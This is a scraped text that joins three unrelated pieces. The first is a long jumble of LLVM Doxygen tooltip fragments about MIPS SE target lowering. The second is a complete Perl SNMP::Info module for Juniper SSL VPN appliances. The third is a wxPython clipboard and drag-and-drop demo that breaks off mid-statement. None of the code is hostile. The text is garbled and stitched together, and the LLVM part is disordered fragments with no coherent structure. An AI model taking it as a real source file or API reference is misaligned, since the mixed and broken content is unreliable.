nodes. const MipsTargetLowering * createMipsSETargetLowering(const MipsTargetMachine &TM, const MipsSubtarget &STI) Fast - This calling convention attempts to make calls as fast as possible (e.g. Definition: CallingConv.h:43 uint64_t CallInst * C BITCAST - This operator converts between integer, vector and FP values, as if the value was stored to... Definition: ISDOpcodes.h:545 static SDValue genConstMult(SDValue X, APInt C, const SDLoc &DL, EVT VT, EVT ShiftTy, SelectionDAG &DAG) const MachineInstrBuilder & add(const MachineOperand &MO) const BUILTIN_OP_END - This must be the last enum value in this list. Definition: ISDOpcodes.h:834 FMINNUM/FMAXNUM - Perform floating-point minimum or maximum on two values. Definition: ISDOpcodes.h:569 EVT getValueType() const Return the ValueType of the referenced return value. static GCMetadataPrinterRegistry::Add< ErlangGCPrinter > X("erlang", "erlang-compatible garbage collector") void setLoadExtAction(unsigned ExtType, MVT ValVT, MVT MemVT, LegalizeAction Action) Indicate that the specified load with extension does not work with the specified type and indicate wh... EXTRACT_ELEMENT - This is used to get the lower or upper (determined by a Constant, which is required to be operand #1) half of the integer or float value specified as operand #0. Definition: ISDOpcodes.h:184 uint64_t getZExtValue() const Get zero extended value. Definition: APInt.h:1542 unsigned getOpcode() const Return the SelectionDAG opcode value for this node. SDValue getSetCC(const SDLoc &DL, EVT VT, SDValue LHS, SDValue RHS, ISD::CondCode Cond) Helper function to make it easier to build SetCC&#39;s if you just have an ISD::CondCode instead of an SD... Definition: SelectionDAG.h:898 typename SuperClass::const_iterator const_iterator Definition: SmallVector.h:329 const TargetRegisterClass * getRegClass(unsigned Reg) const Return the register class of the specified virtual register. const MipsSubtarget & Subtarget bool isConstantSplat(APInt &SplatValue, APInt &SplatUndef, unsigned &SplatBitSize, bool &HasAnyUndefs, unsigned MinSplatBits=0, bool isBigEndian=false) const Check if this is a constant splat, and if so, find the smallest element size that splats the vector... LLVM_ATTRIBUTE_NORETURN void report_fatal_error(Error Err, bool gen_crash_diag=true) Report a serious error, calling any installed error handler. Definition: Error.cpp:115 BR_CC - Conditional branch. Definition: ISDOpcodes.h:617 Compute iterated dominance frontiers using a linear time algorithm. Definition: AllocatorList.h:24 value_iterator value_end() const static SDValue initAccumulator(SDValue In, const SDLoc &DL, SelectionDAG &DAG) bool allowsMisalignedMemoryAccesses(EVT VT, unsigned AS=0, unsigned Align=1, bool *Fast=nullptr) const override Determine if the target supports unaligned memory accesses. static SDValue performVSELECTCombine(SDNode *N, SelectionDAG &DAG) VECTOR_SHUFFLE(VEC1, VEC2) - Returns a vector, of the same type as VEC1/VEC2. Definition: ISDOpcodes.h:342 EVT getScalarType() const If this is a vector type, return the element type, otherwise return this. Definition: ValueTypes.h:260 virtual const TargetRegisterClass * getRepRegClassFor(MVT VT) const Return the &#39;representative&#39; register class for the specified value type. LLVM_ATTRIBUTE_ALWAYS_INLINE size_type size() const Definition: SmallVector.h:136 MachineBasicBlock * EmitInstrWithCustomInserter(MachineInstr &MI, MachineBasicBlock *MBB) const override This method should be implemented by targets that mark instructions with the &#39;usesCustomInserter&#39; fla... unsigned createVirtualRegister(const TargetRegisterClass *RegClass) createVirtualRegister - Create and return a new virtual register in the function with the specified r... const SDValue & getBasePtr() const EVT getValueType(unsigned ResNo) const Return the type of a specified result. const DebugLoc & getDebugLoc() const Returns the debug location id of this MachineInstr. Definition: MachineInstr.h:268 static SDValue performANDCombine(SDNode *N, SelectionDAG &DAG, TargetLowering::DAGCombinerInfo &DCI, const MipsSubtarget &Subtarget) unsigned getReg() const getReg - Returns the register number. const SDValue & getValue() const void transferSuccessorsAndUpdatePHIs(MachineBasicBlock *FromMBB) Transfers all the successors, as in transferSuccessors, and update PHI operands in the successor bloc... SDVTList getVTList() const static APInt getLowBitsSet(unsigned numBits, unsigned loBitsSet) Get a value with low bits set. Definition: APInt.h:641 MVT getSimpleVT() const Return the SimpleValueType held in the specified simple EVT. Definition: ValueTypes.h:253 const MipsInstrInfo * getInstrInfo() const override AAMDNodes getAAInfo() const Returns the AA info that describes the dereference. const SDValue & getChain() const uint64_t getSize() const Return the size in bytes of the memory reference. bool isABI_O32() const unsigned getAlignment() const APInt trunc(unsigned width) const Truncate to new width. Definition: APInt.cpp:818 A debug info location. Definition: DebugLoc.h:34 bool isInteger() const Return true if this is an integer or a vector integer type. Definition: ValueTypes.h:141 F(f) MachineBasicBlock * EmitInstrWithCustomInserter(MachineInstr &MI, MachineBasicBlock *MBB) const override This method should be implemented by targets that mark instructions with the &#39;usesCustomInserter&#39; fla... SDNode * getNode() const get the SDNode which holds the desired result SDValue getNode(unsigned Opcode, const SDLoc &DL, EVT VT, ArrayRef< SDUse > Ops) Gets or creates the specified node. SDValue PerformDAGCombine(SDNode *N, DAGCombinerInfo &DCI) const override This method will be invoked for all target nodes and for any target-independent nodes that the target... MachineMemOperand * getMemOperand() const Return a MachineMemOperand object describing the memory reference performed by operation. OUTCHAIN = ATOMIC_FENCE(INCHAIN, ordering, scope) This corresponds to the fence instruction. Definition: ISDOpcodes.h:748 Select with condition operator - This selects between a true value and a false value (ops #2 and #3) ... Definition: ISDOpcodes.h:404 unsigned getBitWidth() const Return the number of bits in the APInt. Definition: APInt.h:1488 This SDNode is used to implement the code generator support for the llvm IR shufflevector instruction... void setTruncStoreAction(MVT ValVT, MVT MemVT, LegalizeAction Action) Indicate that the specified truncating store does not work with the specified type and indicate what ... void printrWithDepth(raw_ostream &O, const SelectionDAG *G=nullptr, unsigned depth=100) const Print a SelectionDAG node and children up to depth "depth." The given SelectionDAG allows target-spec... RESULT,OUTCHAIN = INTRINSIC_W_CHAIN(INCHAIN, INTRINSICID, arg1, ...) This node represents a target in... Definition: ISDOpcodes.h:159 const Triple & getTargetTriple() const getTargetTriple - Return the target triple string. SDValue LowerOperation(SDValue Op, SelectionDAG &DAG) const override LowerOperation - Provide custom lowering hooks for some operations. bool hasMips64() const SDIVREM/UDIVREM - Divide two integers and produce both a quotient and remainder result. Definition: ISDOpcodes.h:209 bool hasDSPR2() const static SDValue lowerMSAStoreIntr(SDValue Op, SelectionDAG &DAG, unsigned Intr, const MipsSubtarget &Subtarget) A description of a memory reference used in the backend. const HexagonInstrInfo * TII ArrayRef< T > makeArrayRef(const T &OneElt) Construct an ArrayRef from a single element. Definition: ArrayRef.h:451 Shift and rotation operations. Definition: ISDOpcodes.h:379 unsigned getNumOperands() const Access to explicit operands of the instruction. Definition: MachineInstr.h:293 BUILD_PAIR - This is the opposite of EXTRACT_ELEMENT in some ways. Definition: ISDOpcodes.h:190 This class consists of common code factored out of the SmallVector class to reduce code duplication b... Definition: APFloat.h:42 void eraseFromParent() Unlink &#39;this&#39; from the containing basic block and delete it. unsigned getScalarValueSizeInBits() const bool isGP64bit() const void setCondCodeAction(ISD::CondCode CC, MVT VT, LegalizeAction Action) Indicate that the specified condition code is or isn&#39;t supported on the target and indicate what to d... SimpleValueType SimpleTy static SDValue lowerMSABitClearImm(SDValue Op, SelectionDAG &DAG) bool hasMips32r6() const static bool isConstantOrUndefBUILD_VECTOR(const BuildVectorSDNode *Op) unsigned getOpcode() const Returns the opcode of this MachineInstr. Definition: MachineInstr.h:290 void setOperationAction(unsigned Op, MVT VT, LegalizeAction Action) Indicate that the specified operation does not work with the specified type and indicate what to do a... const DataLayout & getDataLayout() const Definition: SelectionDAG.h:388 MachineMemOperand * getMachineMemOperand(MachinePointerInfo PtrInfo, MachineMemOperand::Flags f, uint64_t s, unsigned base_alignment, const AAMDNodes &AAInfo=AAMDNodes(), const MDNode *Ranges=nullptr, SyncScope::ID SSID=SyncScope::System, AtomicOrdering Ordering=AtomicOrdering::NotAtomic, AtomicOrdering FailureOrdering=AtomicOrdering::NotAtomic) getMachineMemOperand - Allocate a new MachineMemOperand. This file implements a class to represent arbitrary precision integral constant values and operations... static SDValue lowerVECTOR_SHUFFLE_VSHF(SDValue Op, EVT ResTy, SmallVector< int, 16 > Indices, SelectionDAG &DAG) SDValue getMergeValues(ArrayRef< SDValue > Ops, const SDLoc &dl) Create a MERGE_VALUES node from the given operands. unsigned getScalarSizeInBits() const Definition: ValueTypes.h:298 unsigned getSizeInBits() const Return the size of the specified value type in bits. Definition: ValueTypes.h:292 static bool isVSplat(SDValue N, APInt &Imm, bool IsLittleEndian) [SU]INT_TO_FP - These operators convert integers (whose interpreted sign depends on the first letter)... Definition: ISDOpcodes.h:455 void computeRegisterProperties(const TargetRegisterInfo *TRI) Once all of the register classes are added, this allows us to compute derived properties we expose... Select with a vector condition (op #0) and two vector operands (ops #1 and #2), returning a vector re... Definition: ISDOpcodes.h:398 static bool isVECTOR_SHUFFLE_SPLATI(SDValue Op, EVT ResTy, SmallVector< int, 16 > Indices, SelectionDAG &DAG) Simple integer binary arithmetic operators. Definition: ISDOpcodes.h:200 static bool isConstantOrUndef(const SDValue Op) unsigned getIncomingArgSize() const SDValue getUNDEF(EVT VT) Return an UNDEF node. UNDEF does not have a useful SDLoc. Definition: SelectionDAG.h:830 CondCode ISD::CondCode enum - These are ordered carefully to make the bitfields below work out... Definition: ISDOpcodes.h:916 TargetConstant* - Like Constant*, but the DAG does not do any folding, simplification, or lowering of the constant. Definition: ISDOpcodes.h:125 SDValue getTargetConstant(uint64_t Val, const SDLoc &DL, EVT VT, bool isOpaque=false) Definition: SelectionDAG.h:558 static SDValue lowerVECTOR_SHUFFLE_ILVR(SDValue Op, EVT ResTy, SmallVector< int, 16 > Indices, SelectionDAG &DAG) amdgpu Simplify well known AMD library false Value * Callee RESULT = INTRINSIC_WO_CHAIN(INTRINSICID, arg1, arg2, ...) This node represents a target intrinsic fun... Definition: ISDOpcodes.h:151 MachineBasicBlock * CreateMachineBasicBlock(const BasicBlock *bb=nullptr) CreateMachineBasicBlock - Allocate a new MachineBasicBlock. This class is used to represent ISD::STORE nodes. FP_TO_[US]INT - Convert a floating point value to a signed or unsigned integer. Definition: ISDOpcodes.h:498 BUILD_VECTOR(ELT0, ELT1, ELT2, ELT3,...) - Return a vector with the specified, possibly variable... Definition: ISDOpcodes.h:302 TargetInstrInfo - Interface to description of machine instruction set. static APInt getHighBitsSet(unsigned numBits, unsigned hiBitsSet) Get a value with high bits set. Definition: APInt.h:629 static SDValue performORCombine(SDNode *N, SelectionDAG &DAG, TargetLowering::DAGCombinerInfo &DCI, const MipsSubtarget &Subtarget) static SDValue lowerMSASplatImm(SDValue Op, unsigned ImmOp, SelectionDAG &DAG, bool IsSigned=false) virtual void getOpndList(SmallVectorImpl< SDValue > &Ops, std::deque< std::pair< unsigned, SDValue >> &RegsToPass, bool IsPICCall, bool GlobalOrExternal, bool InternalLinkage, bool IsCallReloc, CallLoweringInfo &CLI, SDValue Callee, SDValue Chain) const This function fills Ops, which is the list of operands that will later be used when a function call n... MachineInstrBuilder BuildMI(MachineFunction &MF, const DebugLoc &DL, const MCInstrDesc &MCID) Builder interface. Specify how to create the initial instruction itself. static MDTuple * get(LLVMContext &Context, ArrayRef< Metadata *> MDs) Definition: Metadata.h:1164 bool isNegative() const Determine sign of this APInt. Definition: APInt.h:357 const SDValue & getBasePtr() const initializer< Ty > init(const Ty &Val) Definition: CommandLine.h:406 OUTCHAIN = INTRINSIC_VOID(INCHAIN, INTRINSICID, arg1, arg2, ...) This node represents a target intrin... Definition: ISDOpcodes.h:166 bool isAllOnesValue() const Determine if all bits are set. Definition: APInt.h:389 static GCRegistry::Add< OcamlGC > B("ocaml", "ocaml 3.10-compatible GC") static SDValue lowerVECTOR_SHUFFLE_ILVEV(SDValue Op, EVT ResTy, SmallVector< int, 16 > Indices, SelectionDAG &DAG) MVT getPointerTy(const DataLayout &DL, uint32_t AS=0) const Return the pointer type for the given address space, defaults to the pointer type from the data layou... static SDValue lowerDSPIntr(SDValue Op, SelectionDAG &DAG, unsigned Opc) Machine Value Type. bool isLittleEndian() const Tests whether the target triple is little endian. Definition: Triple.cpp:1470 LLVM Basic Block Representation. Definition: BasicBlock.h:59 static SDValue lowerMSALoadIntr(SDValue Op, SelectionDAG &DAG, unsigned Intr, const MipsSubtarget &Subtarget) static SDValue getBuildVectorSplat(EVT VecTy, SDValue SplatValue, bool BigEndian, SelectionDAG &DAG) void addRegisterClass(MVT VT, const TargetRegisterClass *RC) Add the specified register class as an available regclass for the specified value type... Simple binary floating point operators. Definition: ISDOpcodes.h:259 void setTargetDAGCombine(ISD::NodeType NT) Targets should invoke this method for each target independent node that they want to provide a custom... static bool isLegalDSPCondCode(EVT Ty, ISD::CondCode CC) unsigned getVectorNumElements() const Given a vector type, return the number of elements it contains. Definition: ValueTypes.h:273 static GCRegistry::Add< CoreCLRGC > E("coreclr", "CoreCLR-compatible GC") LLVM_ATTRIBUTE_ALWAYS_INLINE iterator begin() Definition: SmallVector.h:116 const SDValue & getOperand(unsigned Num) const INSERT_VECTOR_ELT(VECTOR, VAL, IDX) - Returns VECTOR with the element at IDX replaced with VAL... Definition: ISDOpcodes.h:307 static bool isVectorAllOnes(SDValue N) static SDValue lowerVECTOR_SHUFFLE_PCKEV(SDValue Op, EVT ResTy, SmallVector< int, 16 > Indices, SelectionDAG &DAG) static const unsigned End const APInt & getAPIntValue() const static SDValue performSRACombine(SDNode *N, SelectionDAG &DAG, TargetLowering::DAGCombinerInfo &DCI, const MipsSubtarget &Subtarget) static mvt_range vector_valuetypes() X = FP_EXTEND(Y) - Extend a smaller FP type into a larger FP type. Definition: ISDOpcodes.h:530 SDValue lowerLOAD(SDValue Op, SelectionDAG &DAG) const Extended Value Type. Definition: ValueTypes.h:34 static bool fitsRegularPattern(typename SmallVectorImpl< ValType >::const_iterator Begin, unsigned CheckStride, typename SmallVectorImpl< ValType >::const_iterator End, ValType ExpectedIndex, unsigned ExpectedIndexStride) Determine whether a range fits a regular pattern of values. bool isSingleFloat() const unsigned ceilLogBase2() const Definition: APInt.h:1730 This structure contains all information that is necessary for lowering calls. bool hasMips64r6() const This class contains a discriminated union of information about pointers in memory operands... unsigned getNumOperands() const Return the number of values used by this operation. #define llvm_unreachable(msg) Marks that the current location is not supposed to be reachable. APInt lshr(unsigned shiftAmt) const Logical right-shift function. Definition: APInt.h:959 SDValue getLoad(EVT VT, const SDLoc &dl, SDValue Chain, SDValue Ptr, MachinePointerInfo PtrInfo, unsigned Alignment=0, MachineMemOperand::Flags MMOFlags=MachineMemOperand::MONone, const AAMDNodes &AAInfo=AAMDNodes(), const MDNode *Ranges=nullptr) Loads are not normal binary operators: their result type is not determined by their operands... bool isBuildVectorAllOnes(const SDNode *N) Return true if the specified node is a BUILD_VECTOR where all of the elements are ~0 or undef... Iterator for intrusive lists based on ilist_node. CCState - This class holds information needed while lowering arguments and return values... void addSuccessor(MachineBasicBlock *Succ, BranchProbability Prob=BranchProbability::getUnknown()) Add Succ as a successor of this MachineBasicBlock. static SDValue truncateVecElts(SDValue Op, SelectionDAG &DAG) static SDValue performSHLCombine(SDNode *N, SelectionDAG &DAG, TargetLowering::DAGCombinerInfo &DCI, const MipsSubtarget &Subtarget) bool isLittle() const mmo_iterator memoperands_begin() const Access to memory operands of the instruction. Definition: MachineInstr.h:389 const MipsRegisterInfo * getRegisterInfo() const override EXTRACT_VECTOR_ELT(VECTOR, IDX) - Returns a single element from VECTOR identified by the (potentially... Definition: ISDOpcodes.h:314 EVT getVectorElementType() const Given a vector type, return the type of each element. Definition: ValueTypes.h:265 static SDValue performMULCombine(SDNode *N, SelectionDAG &DAG, const TargetLowering::DAGCombinerInfo &DCI, const MipsSETargetLowering *TL) double Log2(double Value) Return the log base 2 of the specified value. Definition: MathExtras.h:520 This is used to represent a portion of an LLVM function in a low-level Data Dependence DAG representa... Definition: SelectionDAG.h:209 value_iterator value_begin() const This is a &#39;vector&#39; (really, a variable-sized array), optimized for the case when the array is small... Definition: SmallVector.h:864 SDValue getBuildVector(EVT VT, const SDLoc &DL, ArrayRef< SDValue > Ops) Return an ISD::BUILD_VECTOR node. Definition: SelectionDAG.h:712 static SDValue lowerMSABitClear(SDValue Op, SelectionDAG &DAG) constexpr size_t array_lengthof(T(&)[N]) Find the length of an array. Definition: STLExtras.h:720 bool hasCnMips() const EVT changeVectorElementTypeToInteger() const Return a vector with the same number of elements as this vector, but with the element type converted ... Definition: ValueTypes.h:96 BRCOND - Conditional branch. Definition: ISDOpcodes.h:611 const MachineInstrBuilder & addMemOperand(MachineMemOperand *MMO) const Wrapper class for IR location info (IR ordering and DebugLoc) to be passed into SDNode creation funct... static SDValue lowerMSACopyIntr(SDValue Op, SelectionDAG &DAG, unsigned Opc) Represents one node in the SelectionDAG. SDValue getNOT(const SDLoc &DL, SDValue Val, EVT VT) Create a bitwise NOT operation as (XOR Val, -1). int64_t getImm() const SDValue LowerOperation(SDValue Op, SelectionDAG &DAG) const override LowerOperation - Provide custom lowering hooks for some operations. bool hasDSP() const unsigned logBase2() const Definition: APInt.h:1727 raw_ostream & dbgs() dbgs() - This returns a reference to a raw_ostream for debugging messages. Definition: Debug.cpp:132 void swap(llvm::BitVector &LHS, llvm::BitVector &RHS) Implement std::swap in terms of BitVector swap. Definition: BitVector.h:923 static SDValue performXORCombine(SDNode *N, SelectionDAG &DAG, const MipsSubtarget &Subtarget) static SDValue performSETCCCombine(SDNode *N, SelectionDAG &DAG) EVT getMemoryVT() const Return the type of the in-memory value. Class for arbitrary precision integers. Definition: APInt.h:69 static bool isSplatVector(const BuildVectorSDNode *N) Check if the given BuildVectorSDNode is a splat. A "pseudo-class" with methods for operating on BUILD_VECTORs. Select(COND, TRUEVAL, FALSEVAL). Definition: ISDOpcodes.h:389 static SDValue performDSPShiftCombine(unsigned Opc, SDNode *N, EVT Ty, SelectionDAG &DAG, const MipsSubtarget &Subtarget) bool isPowerOf2() const Check if this APInt&#39;s value is a power of two greater than zero. Definition: APInt.h:457 ZERO_EXTEND - Used for integer types, zeroing the new bits. Definition: ISDOpcodes.h:445 static cl::opt< bool > NoDPLoadStore("mno-ldc1-sdc1", cl::init(false), cl::desc("Expand double precision loads and " "stores to their single precision " "counterparts")) static SDValue lowerVECTOR_SHUFFLE_ILVOD(SDValue Op, EVT ResTy, SmallVector< int, 16 > Indices, SelectionDAG &DAG) static SDValue lowerMSASplatZExt(SDValue Op, unsigned OpNr, SelectionDAG &DAG) static SDValue performSRLCombine(SDNode *N, SelectionDAG &DAG, TargetLowering::DAGCombinerInfo &DCI, const MipsSubtarget &Subtarget) FCOPYSIGN(X, Y) - Return the value of X with the sign of Y. Definition: ISDOpcodes.h:287 int getMaskElt(unsigned Idx) const FMINNAN/FMAXNAN - Behave identically to FMINNUM/FMAXNUM, except that when a single input is NaN... Definition: ISDOpcodes.h:572 static bool isBitwiseInverse(SDValue N, SDValue OfNode) MachineRegisterInfo - Keep track of information for virtual and physical registers, including vreg register classes, use/def chains for registers, etc. Representation of each machine instruction. Definition: MachineInstr.h:59 const MachineFunction * getParent() const Return the MachineFunction containing this basic block. LLVM_ATTRIBUTE_ALWAYS_INLINE iterator end() Definition: SmallVector.h:120 bool isVector() const Return true if this is a vector value type. Definition: ValueTypes.h:151 const MachineInstrBuilder & addImm(int64_t Val) const Add a new immediate operand. Bitwise operators - logical and, logical or, logical xor. Definition: ISDOpcodes.h:362 void splice(iterator Where, MachineBasicBlock *Other, iterator From) Take an instruction from MBB &#39;Other&#39; at the position From, and insert it into this MBB right before &#39;... MachineRegisterInfo & getRegInfo() getRegInfo - Return information about the registers currently in use. SMUL_LOHI/UMUL_LOHI - Multiply two integers of type iN, producing a signed/unsigned value of type i[2... Definition: ISDOpcodes.h:205 bool is128BitVector() const Return true if this is a 128-bit vector type. Definition: ValueTypes.h:182 const MCInstrDesc & get(unsigned Opcode) const Return the machine instruction descriptor that corresponds to the specified instruction opcode... Definition: MCInstrInfo.h:45 LOAD and STORE have token chains as their first operand, then the same operands as an LLVM load/store... Definition: ISDOpcodes.h:581 const TargetRegisterClass * getRepRegClassFor(MVT VT) const override Return the &#39;representative&#39; register class for the specified value type. #define I(x, y, z) Definition: MD5.cpp:58 #define N const TargetSubtargetInfo & getSubtarget() const Definition: SelectionDAG.h:390 Flags getFlags() const Return the raw flags of the source value,. SDValue lowerSTORE(SDValue Op, SelectionDAG &DAG) const const BasicBlock * getBasicBlock() const Return the LLVM basic block that this instance corresponded to originally. static SDValue lowerMSABinaryBitImmIntr(SDValue Op, SelectionDAG &DAG, unsigned Opc, SDValue Imm, bool BigEndian) MipsFunctionInfo - This class is derived from MachineFunction private Mips target-specific informatio... LLVM_NODISCARD std::enable_if<!is_simple_type< Y >::value, typename cast_retty< X, const Y >::ret_type >::type dyn_cast(const Y &Val) Definition: Casting.h:323 bool useOddSPReg() const const MachineInstrBuilder & addReg(unsigned RegNo, unsigned flags=0, unsigned SubReg=0) const Add a new virtual register operand. unsigned getOpcode() const FSINCOS - Compute both fsin and fcos as a single operation. Definition: ISDOpcodes.h:575 SDValue getValue(unsigned R) const unsigned getInRegsParamsCount() const bool hasMips32r2() const bool isReg() const isReg - Tests if this is a MO_Register operand. SDValue getConstant(uint64_t Val, const SDLoc &DL, EVT VT, bool isTarget=false, bool isOpaque=false) Create a ConstantSDNode wrapping a constant value. bool isABI_N64() const assert(ImpDefSCC.getReg()==AMDGPU::SCC &&ImpDefSCC.isDef()) void insert(iterator MBBI, MachineBasicBlock *MBB) int64_t getOffset() const For normal values, this is a byte offset added to the base address. LLVM Value Representation. Definition: Value.h:73 uint64_t getConstantOperandVal(unsigned Num) const Helper method returns the integer value of a ConstantSDNode operand. FMA - Perform a * b + c with no intermediate rounding step. Definition: ISDOpcodes.h:277 SDValue getValueType(EVT) std::underlying_type< E >::type Mask() Get a bitmask with 1s in all places up to the high-order bit of E&#39;s largest value. Definition: BitmaskEnum.h:81 bool isUndef() const Return true if the type of the node type undefined. static SDValue lowerVECTOR_SHUFFLE_SHF(SDValue Op, EVT ResTy, SmallVector< int, 16 > Indices, SelectionDAG &DAG) static SDValue lo
__label__pos
0.794926
# SNMP::Info::Layer7::Neoteris # # Copyright (c) 2012 Eric Miller # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the University of California, Santa Cruz nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. package SNMP::Info::Layer7::Neoteris; use strict; use Exporter; use SNMP::Info::Layer7; @SNMP::Info::Layer7::Neoteris::ISA = qw/SNMP::Info::Layer7 Exporter/; @SNMP::Info::Layer7::Neoteris::EXPORT_OK = qw//; use vars qw/$VERSION %GLOBALS %MIBS %FUNCS %MUNGE/; $VERSION = '3.05'; %MIBS = ( %SNMP::Info::Layer7::MIBS, 'UCD-SNMP-MIB' => 'versionTag', 'JUNIPER-IVE-MIB' => 'productVersion', ); %GLOBALS = ( %SNMP::Info::Layer7::GLOBALS, 'os_ver' => 'productVersion', 'cpu' => 'iveCpuUtil', ); %FUNCS = ( %SNMP::Info::Layer7::FUNCS, ); %MUNGE = ( %SNMP::Info::Layer7::MUNGE, ); sub vendor { return 'juniper'; } sub os { return 'ive'; } sub serial { return ''; } 1; __END__ =head1 NAME SNMP::Info::Layer7::Neoteris - SNMP Interface to Juniper SSL VPN appliances =head1 AUTHORS Eric Miller =head1 SYNOPSIS # Let SNMP::Info determine the correct subclass for you. my $neoteris = new SNMP::Info( AutoSpecify => 1, Debug => 1, DestHost => 'myrouter', Community => 'public', Version => 2 ) or die "Can't connect to DestHost.\n"; my $class = $neoteris->class(); print "SNMP::Info determined this device to fall under subclass : $class\n"; =head1 DESCRIPTION Subclass for Juniper SSL VPN appliances =head2 Inherited Classes =over =item SNMP::Info::Layer7 =back =head2 Required MIBs =over =item F =item F =item Inherited Classes' MIBs See L for its own MIB requirements. =back =head1 GLOBALS These are methods that return scalar value from SNMP =over =item $neoteris->vendor() Returns 'juniper'. =item $neoteris->os() Returns C<'ive'>. =item $neoteris->os_ver() C =item $neoteris->cpu() C =item $neoteris->serial() Returns ''. =back =head2 Globals imported from SNMP::Info::Layer7 See documentation in L for details. =head1 TABLE ENTRIES These are methods that return tables of information in the form of a reference to a hash. =head2 Table Methods imported from SNMP::Info::Layer7 See documentation in L for details. =cut
__label__pos
0.93336
import wx #---------------------------------------------------------------------- ID_CopyBtn = wx.NewId() ID_PasteBtn = wx.NewId() ID_BitmapBtn = wx.NewId() #---------------------------------------------------------------------- class ClipTextPanel(wx.Panel): def __init__(self, parent, log): wx.Panel.__init__(self, parent, -1) self.log = log #self.SetFont(wx.Font(10, wx.SWISS, wx.NORMAL, wx.BOLD, False)) sizer = wx.BoxSizer(wx.VERTICAL) sizer.Add( wx.StaticText( self, -1, "Copy/Paste text to/from\n" "this window and other apps" ), 0, wx.EXPAND|wx.ALL, 2 ) self.text = wx.TextCtrl(self, -1, "", style=wx.TE_MULTILINE|wx.HSCROLL) sizer.Add(self.text, 1, wx.EXPAND) hsz = wx.BoxSizer(wx.HORIZONTAL) hsz.Add(wx.Button(self, ID_CopyBtn, " Copy "), 1, wx.EXPAND|wx.ALL, 2) hsz.Add(wx.Button(self, ID_PasteBtn, " Paste "), 1, wx.EXPAND|wx.ALL, 2) sizer.Add(hsz, 0, wx.EXPAND) sizer.Add( wx.Button(self, ID_BitmapBtn, " Copy Bitmap "), 0, wx.EXPAND|wx.ALL, 2 ) self.Bind(wx.EVT_BUTTON, self.OnCopy, id=ID_CopyBtn) self.Bind(wx.EVT_BUTTON, self.OnPaste, id=ID_PasteBtn) self.Bind(wx.EVT_BUTTON, self.OnCopyBitmap, id=ID_BitmapBtn) self.SetAutoLayout(True) self.SetSizer(sizer) def OnCopy(self, evt): self.do = wx.TextDataObject() self.do.SetText(self.text.GetValue()) if wx.TheClipboard.Open(): wx.TheClipboard.SetData(self.do) wx.TheClipboard.Close() else: wx.MessageBox("Unable to open the clipboard", "Error") def OnPaste(self, evt): success = False do = wx.TextDataObject() if wx.TheClipboard.Open(): success = wx.TheClipboard.GetData(do) wx.TheClipboard.Close() if success: self.text.SetValue(do.GetText()) else: wx.MessageBox( "There is no data in the clipboard in the required format", "Error" ) def OnCopyBitmap(self, evt): dlg = wx.FileDialog(self, "Choose a bitmap to copy", wildcard="*.bmp") if dlg.ShowModal() == wx.ID_OK: bmp = wx.Bitmap(dlg.GetPath(), wx.BITMAP_TYPE_BMP) bmpdo = wx.BitmapDataObject(bmp) if wx.TheClipboard.Open(): wx.TheClipboard.SetData(bmpdo) wx.TheClipboard.Close() wx.MessageBox( "The bitmap is now in the Clipboard. Switch to a graphics\n" "editor and try pasting it in..." ) else: wx.MessageBox( "There is no data in the clipboard in the required format", "Error" ) dlg.Destroy() #---------------------------------------------------------------------- class OtherDropTarget(wx.PyDropTarget): def __init__(self, window, log): wx.PyDropTarget.__init__(self) self.log = log self.do = wx.FileDataObject() self.SetDataObject(self.do) def OnEnter(self, x, y, d): self.log.WriteText("OnEnter: %d, %d, %d\n" % (x, y, d)) return wx.DragCopy #def OnDragOver(self, x, y, d): # self.log.WriteText("OnDragOver: %d, %d, %d\n" % (x, y, d)) # return wx.DragCopy def OnLeave(self): self.log.WriteText("OnLeave\n") def OnDrop(self, x, y): self.log.WriteText("OnDrop: %d %d\n" % (x, y)) return True def OnData(self, x, y, d): self.log.WriteText("OnData: %d, %d, %d\n" % (x, y, d)) self.GetData() self.log.WriteText("%s\n" % self.do.GetFilenames()) return d class MyFileDropTarget(wx.FileDropTarget): def __init__(self, window, log): wx.FileDropTarget.__init__(self) self.window = window self.log = log def OnDropFiles(self, x, y, filenames): self.window.SetInsertionPointEnd() self.window.WriteText("\n%d file(s) dropped at %d,%d:\n" % (len(filenames), x, y)) for file in filenames: self.window.WriteText(file + '\n') class MyTextDropTarget(wx.TextDropTarget): def __init__(self, window, log): wx.TextDropTarget.__init__(self) self.window = window self.log = log def OnDropText(self, x, y, text): self.window.WriteText("(%d, %d)\n%s\n" % (x, y, text)) def OnDragOver(self, x, y, d): return wx.DragCopy class FileDropPanel(wx.Panel): def __init__(self, parent, log): wx.Panel.__init__(self, parent, -1) #self.SetFont(wx.Font(10, wx.SWISS, wx.NORMAL, wx.BOLD, False)) sizer = wx.BoxSizer(wx.VERTICAL) sizer.Add( wx.StaticText(self, -1, " \nDrag some files here:"), 0, wx.EXPAND|wx.ALL, 2 ) self.text = wx.TextCtrl( self, -1, "", style = wx.TE_MULTILINE|wx.HSCROLL|wx.TE_READONLY ) dt = MyFileDropTarget(self, log) self.text.SetDropTarget(dt) sizer.Add(self.text, 1, wx.EXPAND) sizer.Add( wx.StaticText(self, -1, " \nDrag some text here:"), 0, wx.EXPAND|wx.ALL, 2 ) self.text2 = wx.TextCtrl( 